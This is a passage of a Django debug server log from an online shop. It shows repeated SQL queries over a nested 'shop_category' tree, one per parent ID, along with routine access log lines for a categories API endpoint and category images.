WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:29:06,576 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:29:06,581 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:29:06,585 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:29:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 06:29:07] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [27/Dec/2019 06:29:07] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 DEBUG 2019-12-27 06:32:05,466 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:32:05,477 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:32:05,484 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:32:05,488 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:32:05,494 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:32:05,500 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:32:05,504 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:32:05,509 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:32:05,513 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:32:05,519 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:32:05,524 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:32:05,528 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:32:05,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:32:05,537 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:32:05,543 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:32:05,547 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:32:05,552 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:32:05,557 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:32:05,561 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:32:05,567 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:32:05,571 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:32:05,575 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:32:05,579 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:32:05,583 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:32:05,587 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:32:05,593 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:32:05,597 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:32:05,601 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:32:05,605 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:32:05,609 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:32:05,615 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:32:05,619 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:32:05,623 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:32:05,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:32:05,631 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:32:05,638 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:32:05,641 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:32:05,645 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:32:05,649 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:32:05,654 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:32:05,658 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:32:05,663 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:32:05,666 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:32:05,670 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:32:05,675 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:32:05,679 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:32:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 06:32:06] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [27/Dec/2019 06:32:06] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 06:32:45] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:42:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 06:45:14,988 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:45:14,995 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:45:14,999 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:45:15,002 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:45:15,006 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:45:15,008 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:45:15,010 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:45:15,013 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:45:15,015 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:45:15,018 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:45:15,020 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:45:15,023 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:45:15,025 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:45:15,027 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:45:15,030 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:45:15,033 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:45:15,035 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY 